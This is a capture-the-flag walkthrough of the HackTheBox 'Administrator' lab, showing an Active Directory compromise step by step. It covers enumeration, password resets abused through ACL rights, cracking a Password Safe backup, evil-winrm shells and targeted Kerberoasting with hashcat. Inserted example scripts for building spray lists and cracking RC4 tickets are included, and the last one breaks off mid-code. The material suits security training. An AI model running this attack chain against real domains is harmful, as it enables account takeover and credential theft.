HTB – Administrator

In this walkthrough, I detail how I achieved full compromise of Administrator on HackTheBox.

by Croclius | Apr 20, 2025

https://www.hackthebox.com/machines/Administrator


Reconnaissance

Given Credentials

As is common in real-life Windows pentests (an assumed-breach scenario), we're given a set of credentials to start with:

Olivia / ichliebedich

nmap/TCP

Nmap showed the set of open ports typical of a Domain Controller (DC): DNS (53), Kerberos (88), RPC (135/593), SMB (139/445), LDAP/LDAPS (389/636), kpasswd (464), WinRM (5985) and ADWS (9389). FTP on 21 is not a DC default and is worth a closer look.

croc@hacker$ rustscan -a 10.10.11.42 --ulimit 5000 -- -A -T5 -Pn -oA Initial
[~] Automatically increasing ulimit value to 5000.
Open 10.10.11.42:21
Open 10.10.11.42:53
Open 10.10.11.42:88
Open 10.10.11.42:135
Open 10.10.11.42:139
Open 10.10.11.42:389
Open 10.10.11.42:445
Open 10.10.11.42:464
Open 10.10.11.42:593
Open 10.10.11.42:636
Open 10.10.11.42:5985
Open 10.10.11.42:9389
Open 10.10.11.42:49664
Open 10.10.11.42:49665
Open 10.10.11.42:49666
Open 10.10.11.42:49667
Open 10.10.11.42:49669
Open 10.10.11.42:53517
Open 10.10.11.42:53528
Open 10.10.11.42:53903
Open 10.10.11.42:53908
Open 10.10.11.42:53909
[~] Starting Nmap
[>] The Nmap command to be run is nmap -A -T5 -Pn -oA Initial -vvv -p 21,53,88,135,139,389,445,464,593,636,9389,49664,49665,49666,49667,49669,53517,53528,53903,53908,53909 10.10.11.42

Starting Nmap 7.95 ( https://nmap.org ) at 2025-01-21 11:34 EST
Nmap scan report for 10.10.11.42
Host is up, received user-set (0.25s latency).
Scanned at 2025-01-21 11:34:39 EST for 91s

PORT      STATE SERVICE       REASON          VERSION
21/tcp    open  ftp           syn-ack ttl 127 Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-01-21 23:34:46Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped    syn-ack ttl 127
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49665/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49666/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
53517/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
53528/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
53903/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
53908/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
53909/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
OS fingerprint not ideal because: Timing level 5 (Insane) used
Aggressive OS guesses: Microsoft Windows 10 1703 or Windows 11 21H2 (97%), Microsoft Windows Server 2022 (96%), Windows Server 2019 (95%), Microsoft Windows Server 2012 or 2012 R2 (94%), Microsoft Windows 10 1703 (93%), Windows Server 2022 (93%), Microsoft Windows Server 2016 or Server 2019 (93%), Microsoft Windows 10 1511 (93%), Microsoft Windows Server 2012 (93%), Microsoft Windows Server 2016 (93%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.95%E=4%D=1/21%OT=21%CT=%CU=30024%PV=Y%DS=2%DC=T%G=N%TM=678FCCFA%P=x86_64-pc-linux-gnu)
SEQ(SP=103%GCD=1%ISR=10C%TI=I%CI=I%II=I%SS=S%TS=A)
SEQ(SP=108%GCD=1%ISR=10C%TI=I%CI=I%TS=A)
OPS(O1=M53CNW8ST11%O2=M53CNW8ST11%O3=M53CNW8NNT11%O4=M53CNW8ST11%O5=M53CNW8ST11%O6=M53CST11)
WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFDC)
ECN(R=Y%DF=Y%T=80%W=FFFF%O=M53CNW8NNS%CC=Y%Q=)
T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)
T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)
T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)
T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)
U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)
IE(R=Y%DFI=N%T=80%CD=Z)

Uptime guess: 0.274 days (since Tue Jan 21 05:02:05 2025)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=264 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| p2p-conficker: 
|   Checking for Conficker.C or higher...
|   Check 1 (port 35406/tcp): CLEAN (Couldn't connect)
|   Check 2 (port 20522/tcp): CLEAN (Couldn't connect)
|   Check 3 (port 52617/udp): CLEAN (Failed to receive data)
|   Check 4 (port 52572/udp): CLEAN (Timeout)
|_  0/4 checks are positive: Host is CLEAN or ports are blocked
|_clock-skew: 6h59m59s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-01-21T23:35:55
|_  start_date: N/A

TRACEROUTE (using port 445/tcp)
HOP RTT       ADDRESS
1   281.14 ms 10.10.14.1
2   301.15 ms 10.10.11.42

Nmap done: 1 IP address (1 host up) scanned in 93.79 seconds
           Raw packets sent: 85 (6.902KB) | Rcvd: 92 (6.282KB)

The LDAP banner gives the domain (administrator.htb) and the service info gives the hostname (DC), so let's add both to the hosts file:

croc@hacker:~$ sudo sed -i '$a10.10.11.42\tDC.administrator.htb administrator.htb' /etc/hosts

Ldapdomaindump - 389/tcp

I started by looking at our environment and evaluating the attack surface:

croc@hacker$ sudo /usr/bin/ldapdomaindump ldap://10.10.11.42 -u 'ADMINISTRATOR\Olivia' -p 'ichliebedich'  
[*] Connecting to host...
[*] Binding to host
[+] Bind OK
[*] Starting domain dump
[+] Domain dump finished
                                                                                                                         
croc@hacker$ ls
domain_computers_by_os.html  domain_groups.grep  domain_policy.html  domain_trusts.json          domain_users.json
domain_computers.grep        domain_groups.html  domain_policy.json  domain_users_by_group.html
domain_computers.html        domain_groups.json  domain_trusts.grep  domain_users.grep
domain_computers.json        domain_policy.grep  domain_trusts.html  domain_users.html

croc@hacker$ firefox domain_users_by_group.html

This gave me a clear picture of the users and groups on the target. I make a habit of saving the usernames to a users.txt file, which comes in very handy later for password spraying.
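Here is how I'd automate that users.txt habit. This is an added example, not part of the original walkthrough and not code from ldapdomaindump: it parses a dump in the JSON shape ldapdomaindump writes via ldap3 (a list of entries, each with a dn and an attributes dict whose values are lists), keeps only enabled accounts for the spray list, and flags direct members of Remote Management Users, which is what decides who can use WinRM. The embedded sample is constructed to mirror this box's users; the DNs and userAccountControl values are illustrative, and the group-membership check only sees direct memberOf entries, not nested groups.

```python
"""Build a spray list and a WinRM-candidate list from ldapdomaindump's
domain_users.json.  Added example, not from the walkthrough or ldapdomaindump.
The sample data is constructed in the shape ldap3/ldapdomaindump emit (a list
of entries with 'dn' and an 'attributes' dict whose values are lists)."""
import json
import sys

ACCOUNTDISABLE = 0x0002  # userAccountControl flag: account is disabled

# Constructed sample mirroring this box's users; DNs and UAC values are illustrative.
SAMPLE_USERS_JSON = json.dumps([
    {"dn": "CN=olivia,CN=Users,DC=administrator,DC=htb",
     "attributes": {"sAMAccountName": ["olivia"], "userAccountControl": [66048],
                    "memberOf": ["CN=Remote Management Users,CN=Builtin,DC=administrator,DC=htb"]}},
    {"dn": "CN=michael,CN=Users,DC=administrator,DC=htb",
     "attributes": {"sAMAccountName": ["michael"], "userAccountControl": [66048],
                    "memberOf": ["CN=Remote Management Users,CN=Builtin,DC=administrator,DC=htb"]}},
    {"dn": "CN=benjamin,CN=Users,DC=administrator,DC=htb",
     "attributes": {"sAMAccountName": ["benjamin"], "userAccountControl": [66048],
                    "memberOf": ["CN=Share Moderators,CN=Users,DC=administrator,DC=htb"]}},
    {"dn": "CN=krbtgt,CN=Users,DC=administrator,DC=htb",
     "attributes": {"sAMAccountName": ["krbtgt"], "userAccountControl": [514],
                    "memberOf": ["CN=Denied RODC Password Replication Group,CN=Users,DC=administrator,DC=htb"]}},
    {"dn": "CN=Guest,CN=Users,DC=administrator,DC=htb",
     "attributes": {"sAMAccountName": ["Guest"], "userAccountControl": [66082],
                    "memberOf": []}},
])


def first(value):
    """ldap3 serialises every attribute as a list; unwrap single-valued ones."""
    if isinstance(value, list):
        return value[0] if value else None
    return value


def load_users(text):
    return json.loads(text)


def is_enabled(entry):
    uac = first(entry["attributes"].get("userAccountControl")) or 0
    return not (int(uac) & ACCOUNTDISABLE)


def spray_list(entries, include_disabled=False):
    """Unique sAMAccountNames, enabled only by default: disabled accounts cannot
    log on, so spraying them is pure noise in the DC's logs."""
    names = {first(e["attributes"].get("sAMAccountName"))
             for e in entries if include_disabled or is_enabled(e)}
    return sorted([n for n in names if n], key=str.lower)


def direct_members_of(entries, group_cn):
    """Users whose memberOf names the group directly.  memberOf is not expanded
    through nested groups, so a miss means 'unknown', not 'no access'."""
    needle = f"cn={group_cn.lower()},"
    return sorted([first(e["attributes"]["sAMAccountName"]) for e in entries
                   if any(dn.lower().startswith(needle)
                          for dn in e["attributes"].get("memberOf", []))])


def write_spray_list(entries, path="users.txt"):
    names = spray_list(entries)
    with open(path, "w", encoding="utf-8") as fh:
        fh.write("\n".join(names) + "\n")
    return names


if __name__ == "__main__":
    # usage: python3 users_from_dump.py domain_users.json   (falls back to the sample)
    src = open(sys.argv[1], encoding="utf-8").read() if len(sys.argv) > 1 else SAMPLE_USERS_JSON
    users = load_users(src)
    print("users.txt:", write_spray_list(users))
    print("direct Remote Management Users:", direct_members_of(users, "Remote Management Users"))
```

Point it at the real domain_users.json from the dump above and feed users.txt to nxc for spraying; anyone listed under Remote Management Users is a WinRM login candidate as soon as you hold their password.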

[Screenshot: domain_users_by_group.html from ldapdomaindump]

I found that olivia, whom we currently own, is a member of Remote Management Users.

[Screenshot: olivia listed under Remote Management Users]

As port 5985/tcp (WinRM) is open, that membership means we can get an evil-winrm shell as olivia and see what we can do from there.

Evil-WinRM

I got the WinRM access but didn't find anything juicy here!

croc@hacker$ sudo evil-winrm -i 10.10.11.42 -u olivia -p ichliebedich  
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\olivia\Documents>

Time to move on to other options!

SMB - 139/445

I enumerated the available shares with the given credentials. They are valid, but as expected a low-privileged user gets no access to the administrative shares (ADMIN$, C$), only the default read on IPC$, NETLOGON and SYSVOL.

croc@hacker$ sudo nxc smb 10.10.11.42 -u 'Olivia' -p 'ichliebedich' --shares 
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htb\Olivia:ichliebedich
SMB         10.10.11.42     445    DC               [*] Enumerated shares
SMB         10.10.11.42     445    DC               Share           Permissions     Remark
SMB         10.10.11.42     445    DC               -----           -----------     ------
SMB         10.10.11.42     445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.42     445    DC               C$                              Default share
SMB         10.10.11.42     445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.42     445    DC               NETLOGON        READ            Logon server share
SMB         10.10.11.42     445    DC               SYSVOL          READ            Logon server share

FTP - 21/tcp

The credentials Olivia:ichliebedich don't work for the FTP service:

[Screenshot: FTP login as Olivia rejected]

Anonymous access is also not permitted:

[Screenshot: anonymous FTP login rejected]

Think Box

To find a way in, I shifted my focus to enumerating potential attack paths with BloodHound graphs.

BloodHound - 389/tcp

I collected the domain data as JSON with the Python BloodHound ingestor (bloodhound-python) and imported it into BloodHound. Nmap reported a clock skew of almost seven hours, and Kerberos rejects requests more than five minutes off the DC's time, so I synced my clock to the DC first:

croc@hacker$ sudo ntpdate dc.administrator.htb

croc@hacker$ bloodhound-python -c All -u 'olivia' -p 'ichliebedich' -d 'administrator.htb' -ns 10.10.11.42
INFO: Found AD domain: administrator.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc.administrator.htb
INFO: Found 11 users
INFO: Found 53 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc.administrator.htb
INFO: Done in 00M 52S
                                                                                                                         
croc@hacker$ ls
20250121123032_computers.json   20250121123032_domains.json  20250121123032_groups.json  20250121123032_users.json
20250121123032_containers.json  20250121123032_gpos.json     20250121123032_ous.json

I marked olivia as owned and found that she has GenericAll over michael. That means full control: the trustee can do anything to the object, including resetting its password (the loud option), adding a key credential for shadow credentials, or writing an SPN for targeted Kerberoasting.

[Screenshot: BloodHound showing olivia with GenericAll over michael]

Shell as Michael

Changing the Password of Michael

As olivia has full control over michael, she can reset his password without knowing the current one. I used bloodyAD to do that. Bear in mind that a reset is destructive and noisy: the old password is gone and the DC logs the reset, so on a real engagement prefer a reversible abuse where one is available.

croc@hacker$ bloodyAD -u 'olivia' -p 'ichliebedich' -d 'Administrator.htb' --host '10.10.11.42' set password 'Michael' 'Pass@1234'
[+] Password changed successfully!

WinRM Access

As michael is a remote management user, we can get an evil-winrm shell as michael:

croc@hacker$ sudo evil-winrm -i 10.10.11.42 -u 'michael' -p 'Pass@1234'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\michael\Documents>

However, I didn't find anything useful here! Let's move on!

Shell as Emily

Reviewing BloodHound Graphs

Now that we own a new user, it's good practice to go back to the BloodHound graph.

[Screenshot: BloodHound showing michael's outbound control over benjamin]

The user michael can change benjamin's password without knowing the current one (BloodHound's ForceChangePassword edge, i.e. the User-Force-Change-Password extended right).

Changing the Password for Benjamin

I successfully changed the password for benjamin to supportmeonPatreon:

croc@hacker:~$ bloodyAD -u 'michael' -p 'Pass@1234' -d 'Administrator.htb' --host '10.10.11.42' set password 'Benjamin' 'supportmeonPatreon'
[+] Password changed successfully!

We own another user. Hurrah😁!!

Share Enumeration

BloodHound

Looking at the BloodHound graph, I found that benjamin is a member of the Share Moderators group.

[Screenshot: BloodHound showing benjamin in Share Moderators]

Through enumeration on Google, I found out that:

SMB

The password reset worked, but benjamin has no SMB access beyond the defaults:

croc@hacker$ nxc smb 10.10.11.42 -u 'benjamin' -p 'supportmeonPatreon' --shares     
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htb\benjamin:supportmeonPatreon 
SMB         10.10.11.42     445    DC               [*] Enumerated shares
SMB         10.10.11.42     445    DC               Share           Permissions     Remark
SMB         10.10.11.42     445    DC               -----           -----------     ------
SMB         10.10.11.42     445    DC               ADMIN$                          Remote Admin
SMB         10.10.11.42     445    DC               C$                              Default share
SMB         10.10.11.42     445    DC               IPC$            READ            Remote IPC
SMB         10.10.11.42     445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.11.42     445    DC               SYSVOL          READ            Logon server share 

FTP

I successfully logged in as benjamin using our new password. Additionally, I found a backup file.

croc@hacker$ ftp benjamin@DC.administrator.htb
Connected to DC.administrator.htb.
220 Microsoft FTP Service
331 Password required
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||64177|)
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 Backup.psafe3
226 Transfer complete.
ftp> 

I transferred it to my machine. Note the ASCII-mode warning at the end of the transfer: for a binary file like this, run the binary command before mget so line endings aren't rewritten. In this case the file still arrived intact, as the cracking below shows.

ftp> prompt off
Interactive mode off.
ftp> mget *
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||64184|)
125 Data connection already open; Transfer starting.
100% |*****************************************************************************************|   952        3.86 KiB/s    00:00 ETA
226 Transfer complete.
WARNING! 3 bare linefeeds received in ASCII mode.
File may not have transferred correctly.
952 bytes received in 00:00 (3.84 KiB/s)
ftp> 

Backup File

Backup.psafe3

This is a Password Safe V3 database; Password Safe is a popular open-source password manager. The whole database is encrypted under a key derived from a master password, so we need that password to read anything in it.

croc@hacker$ file Backup.psafe3                
Backup.psafe3: Password Safe V3 database

Cracking the Master Password

To view the passwords stored in it we need the master password. John the Ripper (JtR) ships pwsafe2john, which turns the database header (salt, iteration count and the stretched-key hash) into a hash john can attack offline. With an iteration count of only 2048, a wordlist attack is quick.

croc@hacker$ pwsafe2john Backup.psafe3 > backup.hashes
                                                                                                                                      
croc@hacker$ ls
backup.hashes  Backup.psafe3

croc@hacker$ john backup.hashes --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 3 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho     (Backu)     
1g 0:00:00:02 DONE (2025-01-21 15:23) 0.4975g/s 3056p/s 3056c/s 3056C/s Liverpool..iheartyou
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

Hurrah!! The master password has been successfully cracked!

Install Password Safe Password Manager

Install PasswordSafe using the following command:

croc@hacker$ sudo apt update -y && sudo apt install passwordsafe -y

Once installed, you can launch it from the CLI with pwsafe or from the Applications menu.

View the Database File

1. Once installed, open it & you will see the following dialog box:

croc@hacker$ pwsafe Backup.psafe3&
[1] 198610

[Screenshot: Password Safe open-database dialog]

2. Enter the master password we just cracked. Then, hit OK.

[Screenshot: entering the cracked master password]

3. Here we found passwords for three other accounts, including emily's:

[Screenshot: the three stored entries in Password Safe]

4. Copy and paste all these passwords into mousepad or gedit for later use.

[Screenshot: the recovered passwords saved to a text file]

WinRM Access

As emily is a remote management user, we can get a WinRM shell with the password recovered from the database:

croc@hacker$ sudo evil-winrm -i 10.10.11.42 -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb'
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\emily\Documents>

user.txt

*Evil-WinRM* PS C:\Users\emily\desktop> ls


    Directory: C:\Users\emily\desktop


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----        10/30/2024   2:23 PM           2308 Microsoft Edge.lnk
-ar---         1/21/2025   8:11 PM             34 user.txt


*Evil-WinRM* PS C:\Users\emily\desktop> cat user.txt
4a86a2************************

Shell as Root

BloodHound

As we have compromised a bunch of users, we must return to the BloodHound graph and see what we can do. I found that emily has GenericWrite over ethan:

[Screenshot: BloodHound showing emily with GenericWrite over ethan]

Think Box

We have three potential attack vectors: Shadow Credentials, Forced Password Reset, and Targeted Kerberoasting. The first two were unsuccessful for me, so we are going with targeted Kerberoasting. That matches what the right actually grants: GenericWrite lets us write attributes such as servicePrincipalName and msDS-KeyCredentialLink, but it does not include the User-Force-Change-Password extended right, and shadow credentials only pays off when the DC accepts PKINIT (normally because AD CS is present).

Targeted Kerberoasting

With GenericWrite we can set a servicePrincipalName on ethan. Any account with an SPN can be Kerberoasted: we request a service ticket for that SPN, the KDC encrypts it with the account's password-derived key, and we crack that ticket offline. The script sets the SPN, grabs the hash and removes the SPN again, so the change is short-lived.

We will be using the following script in order to perform this attack:

targetedKerberoast by ShutdownRepo (Kerberoast with ACL abuse capabilities): https://github.com/ShutdownRepo/targetedKerberoast

Step#1: Dump the Hash

The script added an SPN to ethan, requested a service ticket, printed the hash and removed the SPN again:

croc@hacker:/opt/targetedKerberoast$ python3 targetedKerberoast.py -v -d 'administrator.htb' -u 'emily' -p 'UXLCI5iETUsIBoFVTj8yQFKoHjXmb' --dc-ip '10.10.11.42'
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (ethan)
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$fff79301f8fe782e17c7fb5d857e5c24$03bec9263f5408d18be2724fa3f6db1562aba7aa9cd2b3ae867714121b84c9739845788db09052ee101765ed0959f2e1dcebcad602f881ffa7e2a6b14883fa1d5c46b859aaee9c3fe568ced9afa0681413b7f310fc6a6cc6bad1d39a55a4c9cb311acbdb7599d4ccf69f8ad923b67d3c0ad9bf0548a3d053ab4cfe03c8feb4ad23a8bea60f0906f60330d55cb4f7c419bb4f9670aa91c9b041e9cc1ae75acb37241f5b9375a30e10b592131e463d3dacb1c6d1c2136699b88ebdca53814cce6d34695ea97f6a0323757494b17ed43690ac96cfef7d3d1b19fb03a4ff6096dbf698d19f9f712c5fcf062021580cbd6e153803bde9bacce0b6e3854f8443af063c48c28043064db82d5d3e9e144d3e84e4cd597c5395c5daaa37aef4979a9eb70a75759d3d7e33eb7dfe7ac3ce7dd3da88954ef3c04dba2a2136e70d76a725164b17f1a19acc39db8b8a15b37794ca97924b38fdd839229efd6109becb8084199ab07714d0f108ea003848169ad6aa5be2dcd34fd054a984bbbe040d36a6fa7a270159ded958a2a2cbccb23343ccfd1f61c43a26af21f40e6693fea688d409afe3e27e279c8c5df1a45a9f213db9508fa91763fc0f68f16982addddc86b2963328545358f43795fed9ecf30efae91d1877e1ef6f551c1a8febde68e976d7d72d36d5a504695eafded2fb885a0541af60f61cd25ac9b83257e94758227b2db1ebe9b9ce8a303535632c8c9f7e3cfa76fdeed33d3f57cd7f6db1c94c3f3a06a256939fec217abe561093b1b48d4b23e8336406dda34903c567316a8d0851376b631b411fa7cd96c07e2979d8ac89b8fc23eff76c0cda93197cc93b35cdebc6cc63a9fc0aa10246f77f988fa75e1644ab78d05a3e95dea386e1b07d2ba901f55dd972cf8546871571fa35b20d9f4bc10ad3798e000f4bdef49ee3b848821e6a769768e8b11cc4ab910d8767b29e5c046561a7abe5e2576c772f30c7d4e70e4e21b982b4429fc5239ea841f2dcdf560b21d5e72f0cf4190c8bafc099723c431a5c40e1d5a9df1bce11fdd05158a0821d2cefb9b240b94f0e99e0466b1e4cfefa64aa081bca49d2f036e36d785ec18310812fbbe574d0663aa243e1a2d58b885e3321defc23684a294c6ae56097914dfaec9f799d37fa331afff32dc14bdcb69327a926be2638668124032bb930a4f3ed3d2636b8a23b7f6a2c38bfd714436ccf63ae61fd854b4ca56d19a0249289b99354265c6316163a3a13cdf9520840ae4869de9b563656ee10fdf95a2cead9d284f54c7f8bfb04bbbc3fdf082f9743f7abda03f1be6b3a8818d405fa00c159d7e897830bb316b3b1a36cff6812c4fdc753049531b34731ea9f5362138f76e8b351241c279dac5d9da6cdeba6e1daf3ec4cf5ca572e293a30020eba7133ad5365888d7edd0f6eb588bbd22a62758e58b9463689e87e599ed64739a5dea443ad527dd6440acc508f0cdc28d5ac7e3bf4628d262f798d8e00950e9f81853855a1f2005bbe2a6a15adfa6b173b1f3fc592455418a6
[VERBOSE] SPN removed successfully for (ethan)

Step#2: Crack the Hash

I saved the hash line to hashes.txt, and hashcat cracked it within seconds using mode 13100 (Kerberos 5 TGS-REP, etype 23):

croc@hacker$ hashcat -m 13100 hashes.txt /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting

$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator.htb/ethan*$fff79301f8fe782e17c7fb5d857e5c24$...5418a6:limpbizkit

Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*ethan$ADMINISTRATOR.HTB$administrator....5418a6
Time.Started.....: Tue Jan 21 23:42:31 2025 (0 secs)
Time.Estimated...: Tue Jan 21 23:42:31 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    76395 H/s (4.12ms) @ Accel:256 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 5376/14344385 (0.04%)
Rejected.........: 0/5376 (0.00%)
Restore.Point....: 4608/14344385 (0.03%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: Liverpool -> ginuwine
Hardware.Mon.#1..: Util: 40%

Started: Tue Jan 21 23:41:00 2025
Stopped: Tue Jan 21 23:42:33 2025

So, the password for ethan is limpbizkit. Congratulations, we owned another user!
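Why that crack took two seconds: RC4-HMAC (etype 23) keys are just the NT hash of the password, with no salt and no stretching, so a cracker only needs one fast MD4 per candidate. The block below is an added example, not code from the walkthrough, hashcat or targetedKerberoast. It implements the RFC 4757 RC4-HMAC construction, forges a small etype-23 enc-part under a known password (the fixed confounder and the stand-in ticket body are constructed; real tickets use a random confounder and a DER-encoded EncTicketPart), writes it out in the $krb5tgs$23$ line format hashcat reads, and then recovers the password from a constructed wordlist exactly the way a cracker does. MD4 is implemented inline because many OpenSSL 3 builds of Python don't expose it in hashlib.

```python
"""RC4-HMAC (Kerberos etype 23) rebuilt from the password, then used to forge
and crack a Kerberoast-style TGS enc-part.  Added example, not code from the
walkthrough, hashcat or targetedKerberoast.  Confounder and ticket body are
constructed stand-ins (real: random confounder, DER EncTicketPart)."""
import hashlib
import hmac
import struct


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4, needed for the NT hash; many OpenSSL 3 builds lack it."""
    M32 = 0xFFFFFFFF
    F = lambda x, y, z: (x & y) | (~x & z)
    G = lambda x, y, z: (x & y) | (x & z) | (y & z)
    H = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & M32
    msg = bytearray(data) + b"\x80"
    while len(msg) % 64 != 56:
        msg += b"\x00"
    msg += struct.pack("<Q", len(data) * 8)
    A, B, C, D = 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476
    rounds = [
        (F, 0x00000000, (3, 7, 11, 19), list(range(16))),
        (G, 0x5A827999, (3, 5, 9, 13), [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15]),
        (H, 0x6ED9EBA1, (3, 9, 11, 15), [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]),
    ]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = A, B, C, D
        for fn, k, shifts, order in rounds:
            for i, idx in enumerate(order):
                # one step updates a register, then the registers rotate (a,b,c,d) -> (d,a',b,c)
                a, b, c, d = d, rotl((a + fn(b, c, d) + X[idx] + k) & M32, shifts[i % 4]), b, c
        A, B, C, D = (A + a) & M32, (B + b) & M32, (C + c) & M32, (D + d) & M32
    return struct.pack("<4I", A, B, C, D)


def nt_hash(password: str) -> bytes:
    """The RC4-HMAC Kerberos key *is* the NT hash: unsalted MD4 of UTF-16LE."""
    return md4(password.encode("utf-16-le"))


def rc4(key: bytes, data: bytes) -> bytes:
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def rc4_hmac_encrypt(key: bytes, usage: int, confounder: bytes, plaintext: bytes):
    """RFC 4757 encrypt: returns (checksum, edata).  Usage 2 = TGS-REP ticket enc-part."""
    k1 = hmac.new(key, struct.pack("<I", usage), hashlib.md5).digest()
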